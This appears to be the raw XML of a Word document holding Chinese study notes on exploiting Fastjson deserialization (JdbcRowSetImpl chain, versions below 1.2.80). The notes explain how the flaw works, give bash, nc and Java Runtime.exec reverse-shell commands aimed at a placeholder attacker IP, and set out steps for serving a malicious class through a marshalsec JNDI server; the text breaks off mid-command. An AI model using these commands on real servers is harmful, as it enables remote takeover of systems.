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159C53" w14:textId="737027E1" w:rsidR="00B257B4" w:rsidRDefault="00C41C1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C47276">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47276">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ast</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47276">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47276">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 反序列化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2CC8ED" w14:textId="104D9285" w:rsidR="00722C87" w:rsidRPr="00722C87" w:rsidRDefault="00722C87">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00722C87">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>利用链：JdbcRow</w:t>
      </w:r>
      <w:r w:rsidRPr="00722C87">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SetImpl</w:t>
      </w:r>
      <w:r w:rsidR="00177B8A">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00177B8A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>然后执行RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F057925" w14:textId="45A943FB" w:rsidR="00C41C1E" w:rsidRDefault="006618F6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;1.2.80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53623A95" w14:textId="17670A07" w:rsidR="006618F6" w:rsidRDefault="006618F6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="00C47276">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E5FCC8" w14:textId="607AFB82" w:rsidR="006618F6" w:rsidRDefault="006618F6">
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>astjson</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把json转为对象 把对象转为json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14474678" w14:textId="36285746" w:rsidR="006618F6" w:rsidRDefault="006618F6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>序列化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4C6ACC" w14:textId="148BAC1F" w:rsidR="006618F6" w:rsidRDefault="006618F6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:t>SON.toJSONString(obj)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E988C7" w14:textId="1147E463" w:rsidR="006618F6" w:rsidRDefault="006618F6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反序列化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499F7C37" w14:textId="7D69B2E0" w:rsidR="006618F6" w:rsidRDefault="006618F6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>.parseObject(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>str,class</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6F4EF6" w14:textId="77777777" w:rsidR="006618F6" w:rsidRDefault="006618F6"/>
    <w:p w14:paraId="3D78D746" w14:textId="55F49DE4" w:rsidR="006618F6" w:rsidRPr="00AB31F6" w:rsidRDefault="006618F6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB31F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558EEF82" w14:textId="05655CBC" w:rsidR="006248E9" w:rsidRPr="009D38B4" w:rsidRDefault="006248E9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D38B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>为什么要反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B906503" w14:textId="5E60B4E8" w:rsidR="00D20B54" w:rsidRDefault="00D20B54" w:rsidP="00D20B54">
      <w:r>
        <w:t xml:space="preserve">反弹shell前提是已经进入对方服务器 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>但是直接在对方服务器上操作命令就不安全</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D801C6C" w14:textId="76E560C5" w:rsidR="00D20B54" w:rsidRDefault="00D20B54" w:rsidP="00D20B54">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">通过对方服务器上连接攻击者本地开启的服务器 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CF50A5" w14:textId="62387CDD" w:rsidR="00D20B54" w:rsidRDefault="00D20B54" w:rsidP="00D20B54">
      <w:r>
        <w:t>然后就</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两者之间发请求 并把输入重定向到攻击者端</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EF7749" w14:textId="5851BC6F" w:rsidR="009D38B4" w:rsidRPr="009D38B4" w:rsidRDefault="009D38B4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D38B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>怎么反弹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE95F44" w14:textId="2DED926A" w:rsidR="009D38B4" w:rsidRDefault="009D38B4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者打开端口等待连接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="ABB2BF"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        </w:rPr>
        <w:t xml:space="preserve">nc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="669900"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="ABB2BF"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        </w:rPr>
        <w:t xml:space="preserve">lvp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="98C379"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBC9FEE" w14:textId="21608D67" w:rsidR="006618F6" w:rsidRDefault="009D38B4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="98C379"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被攻击者运行反弹命令（被攻击者怎么运行 其实就是在该服务器网站上找个输入的入口 写入命令就好了）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="ABB2BF"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        </w:rPr>
        <w:t xml:space="preserve">bash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="669900"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="ABB2BF"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        </w:rPr>
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="669900"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="ABB2BF"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="669900"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="ABB2BF"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="669900"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="ABB2BF"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="669900"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro" w:hint="eastAsia"/>
          <w:color w:val="669900"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro" w:hint="eastAsia"/>
          <w:color w:val="669900"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="669900"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="98C379"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="ABB2BF"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="98C379"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="669900"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="98C379"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F159F5" w14:textId="049575BE" w:rsidR="009D38B4" w:rsidRPr="009D38B4" w:rsidRDefault="009D38B4">
      <w:r w:rsidRPr="009D38B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="009D38B4">
        <w:t>nc</w:t>
      </w:r>
      <w:r w:rsidRPr="009D38B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反弹：</w:t>
      </w:r>
      <w:r w:rsidRPr="009D38B4">
        <w:t xml:space="preserve">nc -e /bin/bash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者IP</w:t>
      </w:r>
      <w:r w:rsidRPr="009D38B4">
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
      <w:r w:rsidRPr="009D38B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还可以telnet反弹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24555316" w14:textId="6665E4D6" w:rsidR="009D38B4" w:rsidRDefault="009D38B4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="98C379"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro" w:hint="eastAsia"/>
          <w:color w:val="98C379"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>然后被攻击者就与攻击者连上了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638A67B1" w14:textId="3F9F53D0" w:rsidR="009D38B4" w:rsidRDefault="00A15D9E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者就可以给对方服务器发请求了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF0D66D" w14:textId="540F2027" w:rsidR="009D38B4" w:rsidRDefault="009D38B4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java反弹就是使用Runtime去执行上面的命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACD3325" w14:textId="77777777" w:rsidR="009D38B4" w:rsidRDefault="009D38B4" w:rsidP="009D38B4">
      <w:r>
        <w:t>Runtime r = Runtime.getRuntime(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0D2FEA69" w14:textId="1BE24E46" w:rsidR="009D38B4" w:rsidRDefault="009D38B4" w:rsidP="009D38B4">
      <w:r>
        <w:t>String cmd[]= {"/bin/bash","-c","exec 5&lt;&gt;/dev/tcp/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>/4444;cat &lt;&amp;5 | while read line; do $line 2&gt;&amp;5 &gt;&amp;5; done"};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02407B11" w14:textId="5B23363D" w:rsidR="009D38B4" w:rsidRDefault="009D38B4" w:rsidP="009D38B4">
      <w:r>
        <w:t xml:space="preserve">Process p = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>r.exec</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(cmd);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBDE223" w14:textId="70E4B074" w:rsidR="009D38B4" w:rsidRDefault="009D38B4" w:rsidP="009D38B4">
      <w:r>
        <w:t>p.waitFor();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BDBA22" w14:textId="77777777" w:rsidR="006618F6" w:rsidRDefault="006618F6"/>
    <w:p w14:paraId="3D95F51A" w14:textId="77777777" w:rsidR="009D38B4" w:rsidRDefault="009D38B4"/>
    <w:p w14:paraId="0396AF64" w14:textId="77777777" w:rsidR="009D38B4" w:rsidRDefault="009D38B4"/>
    <w:p w14:paraId="309CF72F" w14:textId="77777777" w:rsidR="009D38B4" w:rsidRDefault="009D38B4"/>
    <w:p w14:paraId="1D8F4331" w14:textId="0B5E6B71" w:rsidR="006618F6" w:rsidRPr="00AB31F6" w:rsidRDefault="006618F6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB31F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4446C28E" w14:textId="526BE6AD" w:rsidR="006618F6" w:rsidRDefault="006618F6">
      <w:r>
        <w:t>Fastjson</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在解析json的过程中 使用@type字段来指定反序列化的类型</w:t>
      </w:r>
      <w:r w:rsidR="00C47276">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 例如：</w:t>
      </w:r>
      <w:r w:rsidR="00C47276" w:rsidRPr="00C47276">
        <w:t>"@type":"com.sun.rowset.JdbcRowSetImpl",然后</w:t>
      </w:r>
      <w:r w:rsidR="00AB31F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建对象并</w:t>
      </w:r>
      <w:r w:rsidR="00C47276" w:rsidRPr="00C47276">
        <w:t>可以</w:t>
      </w:r>
      <w:r w:rsidR="00912FB4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动</w:t>
      </w:r>
      <w:r w:rsidR="00C47276" w:rsidRPr="00C47276">
        <w:t>执行里面的</w:t>
      </w:r>
      <w:r w:rsidR="00AB31F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>set和get</w:t>
      </w:r>
      <w:r w:rsidR="00C47276" w:rsidRPr="00C47276">
        <w:t>方法.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791F1228" w14:textId="559C9E0B" w:rsidR="006618F6" w:rsidRDefault="006618F6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在处理对象的时候 没有对@type字段进行安全校验 攻击者就可以传入危险类 并调用危险类连接远程RMI主机 然后执行恶意代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5316BB53" w14:textId="77777777" w:rsidR="006618F6" w:rsidRDefault="006618F6"/>
    <w:p w14:paraId="3BA98C6F" w14:textId="5FD04B04" w:rsidR="006618F6" w:rsidRPr="00AB31F6" w:rsidRDefault="006618F6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB31F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377DC47C" w14:textId="502C5845" w:rsidR="00571F88" w:rsidRDefault="00571F88">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>思路：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF50D66" w14:textId="6D6A899D" w:rsidR="00571F88" w:rsidRDefault="00571F88">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先确认是否使用了fastjson</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29523BF1" w14:textId="57B40DD7" w:rsidR="00571F88" w:rsidRDefault="00571F88">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用@type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行传输我们需要引用的类和执行的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DF4E26" w14:textId="5A2B8D74" w:rsidR="00571F88" w:rsidRDefault="00571F88">
      <w:r w:rsidRPr="00571F88">
        <w:t>利用com.sun.rowset.JdbcRowSetImpl执行可以验证POC的脚本，打到我们可以看到的回显上。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB16353" w14:textId="28051138" w:rsidR="00571F88" w:rsidRDefault="00571F88">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9036B3" w14:textId="77777777" w:rsidR="00571F88" w:rsidRDefault="00571F88"/>
    <w:p w14:paraId="64783E9B" w14:textId="50D92F4B" w:rsidR="006618F6" w:rsidRDefault="00571F88">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB31F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>复现</w:t>
      </w:r>
      <w:r w:rsidR="006618F6" w:rsidRPr="00AB31F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="006618F6" w:rsidRPr="00AB31F6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.2.24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5170D7E5" w14:textId="238AA23B" w:rsidR="00AB31F6" w:rsidRPr="00AB31F6" w:rsidRDefault="00AB31F6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先构建恶意代码 然后执行出来</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB31F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">class文件 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6175C661" w14:textId="6C8D9AF6" w:rsidR="006618F6" w:rsidRDefault="00571F88">
      <w:r w:rsidRPr="00571F88">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F7EBDBD" wp14:editId="11639947">
            <wp:extent cx="5274310" cy="3909060"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1784931982" name="图片 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31982" name="图片 1" descr="电脑萤幕的截图&#10;&#10;描述已自动生成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E7F3B" w14:textId="77777777" w:rsidR="006618F6" w:rsidRDefault="006618F6"/>
    <w:p w14:paraId="7BB5E373" w14:textId="4C56E9D7" w:rsidR="00571F88" w:rsidRDefault="00571F88">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入classes目录 打开http server（可以指定端口）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D33136" w14:textId="2FF99BBC" w:rsidR="007D1EA3" w:rsidRDefault="007D1EA3">
      <w:r>
        <w:t xml:space="preserve">Python -m SimpleHTTPServer </w:t>
      </w:r>
      <w:r w:rsidRPr="007D1EA3">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCB59ED" w14:textId="5D640B7A" w:rsidR="00571F88" w:rsidRDefault="005F06F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里也要使用marshalsec打开</w:t>
      </w:r>
      <w:r>
        <w:t>jndi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务（同比log</w:t>
      </w:r>
      <w:r>
        <w:t>4j2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C390F9C" w14:textId="4F962448" w:rsidR="005F06F9" w:rsidRDefault="005F06F9">
      <w:r w:rsidRPr="005F06F9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DFACD46" wp14:editId="6BDB0BAD">
            <wp:extent cx="5274310" cy="2066925"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1445797147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797147" name="图片 1" descr="图形用户界面, 文本, 应用程序, 电子邮件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D9AEB" w14:textId="6FBCEBAB" w:rsidR="007D1EA3" w:rsidRPr="007D1EA3" w:rsidRDefault="007D1EA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D1EA3">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">java -cp marshalsec-0.0.3-SNAPSHOT-all.jar </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D1EA3">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>marshalsec.jndi</w:t>
      </w:r>
